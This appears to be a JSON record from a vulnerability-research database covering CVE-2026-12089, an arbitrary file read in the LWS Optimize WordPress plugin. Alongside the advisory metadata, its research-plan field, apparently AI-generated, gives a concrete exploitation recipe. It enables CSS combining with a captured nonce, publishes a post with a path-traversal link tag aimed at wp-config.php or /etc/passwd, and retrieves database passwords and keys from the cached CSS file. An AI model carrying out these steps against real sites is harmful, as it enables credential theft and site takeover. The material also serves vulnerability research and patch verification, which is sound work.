[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$frC__ysLS2b-oUFZXZKODXFJRBG2ROtLS5g4FWs0PtSY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-12089","ws-optimize-all-in-one-speed-booster-cache-tools-authenticated-editor-arbitrary-file-read","WS Optimize – All-in-One Speed Booster & Cache Tools \u003C= 3.3.19 - Authenticated (Editor+) Arbitrary File Read","The LWS Optimize – All-in-One Speed Booster & Cache Tools plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 3.3.19. This is due to the combine_current_css() function  trusting \u003Clink rel=\"stylesheet\" href=\"...\"> values harvested from page HTML and converting same-site URLs to absolute filesystem paths before reading them with file_get_contents()\u002FMinify\\CSS::add(), without enforcing that the resolved path stay within ABSPATH or have a .css extension. This makes it possible for authenticated attackers, with Editor-level access and above, to read arbitrary files.","lws-optimize",null,"\u003C=3.3.19","3.3.20","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-06-12 14:06:04","2026-06-13 02:29:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5cb80db2-753c-40fa-aee4-7d8c1749d037?source=api-prod",1,[22,23,24,25,26,27,28,29],"Classes\u002FAdmin\u002FLwsOptimizeManageAdmin.php","Classes\u002FFileCache\u002FLwsOptimizeFileCache.php","Classes\u002FFront\u002FLwsOptimizeCSSManager.php","Classes\u002FFront\u002FLwsOptimizeJSManager.php","Classes\u002FLwsOptimize.php","languages\u002Flws-optimize-fr_FR.po","lws-optimize.php","readme.txt","researched",false,3,"This research plan outlines the technical steps required to exploit **CVE-2026-12089**, an Arbitrary File Read vulnerability in the **LWS Optimize** WordPress plugin.\n\n## 1. Vulnerability Summary\nThe **LWS Optimize** plugin (versions \u003C= 3.3.19) features a \"Combine CSS\" functionality designed to reduce HTTP requests by merging multiple stylesheets into a single cached file. The vulnerability exists in the `combine_current_css()` function (within `Classes\u002FFront\u002FLwsOptimizeCSSManager.php`). \n\nThe function parses the HTML of a page, identifies `\u003Clink rel=\"stylesheet\">` tags, and extracts their `href` attributes. It then attempts to convert URLs belonging to the same site into absolute filesystem paths by replacing the site URL with the `ABSPATH` constant. Crucially, the plugin fails to:\n1.  Validate that the resulting path remains within the intended directory (Path Traversal).\n2.  Verify that the file being read has a `.css` extension.\n\nAs a result, an authenticated user with **Editor** privileges (who can inject HTML into posts) can force the plugin to read sensitive files (like `wp-config.php`) and include their contents in a publicly accessible cached CSS file.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Any frontend post or page where the attacker can inject HTML.\n*   **Mechanism:** Output Buffer processing via `LwsOptimizeFileCache::callback`.\n*   **Privilege Level:** Authenticated (Editor or higher). Editors are required because they possess the `unfiltered_html` capability by default, allowing the injection of `\u003Clink>` tags.\n*   **Precondition:** The \"Combine CSS\" option must be enabled in the plugin settings.\n\n## 3. Code Flow\n1.  **Initialization:** `LwsOptimizeFileCache::lwsop_launch_cache()` initiates output buffering with `ob_start([$this, \"callback\"])`.\n2.  **Capture:** When the page finishes rendering, `LwsOptimizeFileCache::callback($buffer)` is called.\n3.  **Processing:** The callback instantiates `Lws\\Classes\\Front\\LwsOptimizeCSSManager` and calls `combine_css_update()`.\n4.  **Extraction:** `combine_css_update()` uses regex `\u002F(\u003Clink\\s*[^>]*+>|\u003Cstyle\\s*.*?\u003C\\\u002Fstyle>)\u002Fxs` to find link tags and extracts the `href` attribute.\n5.  **Traversal Sink:** `combine_current_css($current_links)` (vulnerable function) processes the URLs:\n    *   It identifies URLs matching `get_site_url()`.\n    *   It converts them to paths: `$path = str_replace(get_site_url(), ABSPATH, $url);` (inferred logic based on `LwsOptimizeJSManager.php` and CVE description).\n    *   It uses `file_get_contents($path)` or `Minify\\CSS::add($path)` to read the file content.\n6.  **Exposure:** The content is written to a new file in `wp-content\u002Fcache\u002Flwsoptimize\u002Fcache-css\u002F`. The URL to this file is injected back into the page HTML.\n\n## 4. Nonce Acquisition Strategy\nWhile the file read is triggered on the frontend (no nonce required for rendering), the attacker may first need to enable the \"Combine CSS\" setting if it is disabled.\n\n1.  **Identify Shortcode:** To ensure the plugin's admin scripts are loaded, the agent should check the admin dashboard.\n2.  **Enable Setting:** The AJAX action is `lws_optimize_checkboxes_action` (found in `LwsOptimizeManageAdmin.php`).\n3.  **Acquire Nonce:**\n    *   Navigate to the plugin configuration page: `\u002Fwp-admin\u002Fadmin.php?page=lws-op-config` (inferred slug).\n    *   Use `browser_eval` to extract the nonce from the localized script variable.\n    *   **JavaScript Variable:** `lws_op_obj` or `lws_optimize_admin` (inferred from plugin naming conventions).\n    *   **Command:** `browser_eval(\"window.lws_op_obj?.nonce\")` (Verify the exact variable name in the page source if this fails).\n\n## 5. Exploitation Strategy\n### Step 1: Enable Necessary Settings\nIf not already enabled, use the `http_request` tool to enable CSS combination.\n*   **Action:** `lws_optimize_checkboxes_action`\n*   **Parameters:** `action=lws_optimize_checkboxes_action&id=css_optimize&sub_id=combine&state=true&nonce=[NONCE]`\n\n### Step 2: Inject Payload\nCreate a new post containing a crafted `\u003Clink>` tag pointing to `wp-config.php` via path traversal.\n*   **Tool:** `wp_cli`\n*   **Command:** `wp post create --post_type=post --post_status=publish --post_title=\"CSS Test\" --post_content='\u003Clink rel=\"stylesheet\" href=\"http:\u002F\u002F[TARGET_DOMAIN]\u002Fwp-content\u002F..\u002F..\u002F..\u002Fwp-config.php\" media=\"all\">'`\n*   *Note:* The number of `..\u002F` segments should be sufficient to reach the root from the `wp-content` directory.\n\n### Step 3: Trigger the Read\nVisit the newly created post to trigger the output buffer processing.\n*   **Tool:** `http_request` (GET) to the post URL.\n\n### Step 4: Retrieve the File Content\nThe plugin will replace the injected `\u003Clink>` with a new one pointing to the combined cache.\n1.  Inspect the response HTML from Step 3.\n2.  Find the tag: `\u003Clink rel='stylesheet' href='...\u002Fwp-content\u002Fcache\u002Flwsoptimize\u002Fcache-css\u002F[HASH].css' ...>`\n3.  Request that `.css` URL using `http_request`.\n4.  The content of `wp-config.php` will be inside this CSS file.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `lws-optimize` is active.\n2.  **User Creation:** Create a user with the 'editor' role.\n    *   `wp user create attacker attacker@example.com --role=editor --user_pass=password`\n3.  **Configuration:** Verify the cache directory exists and is writable: `wp-content\u002Fcache\u002Flwsoptimize\u002F`.\n\n## 7. Expected Results\n*   The HTTP response for the post frontend will contain a link to a generated CSS file in the `cache-css` directory.\n*   The generated CSS file will contain the raw PHP code (including `DB_PASSWORD` and `AUTH_KEY` values) from the site's `wp-config.php`.\n\n## 8. Verification Steps\n1.  **Check Cache Generation:** Verify the file was created on disk via WP-CLI:\n    *   `ls -la wp-content\u002Fcache\u002Flwsoptimize\u002Fcache-css\u002F`\n2.  **Compare Content:** Use WP-CLI to read the actual `wp-config.php` and compare it with the content retrieved from the CSS cache to confirm a perfect match.\n\n## 9. Alternative Approaches\nIf the plugin filters `wp-config.php` specifically, attempt to read `\u002Fetc\u002Fpasswd`:\n*   **Payload:** `\u003Clink rel=\"stylesheet\" href=\"http:\u002F\u002F[TARGET_DOMAIN]\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\" media=\"all\">`\n\nIf the Editor role lacks `unfiltered_html` (e.g., on a Multisite install), attempt the exploit as an **Administrator**. The vulnerability severity remains high as it allows for information disclosure that can lead to full site takeover via database access.","gemini-3-flash-preview","2026-06-26 00:36:55","2026-06-26 00:38:05",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.3.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flws-optimize\u002Ftags\u002F3.3.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flws-optimize.3.3.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flws-optimize\u002Ftags\u002F3.3.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flws-optimize.3.3.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flws-optimize\u002Ftags"]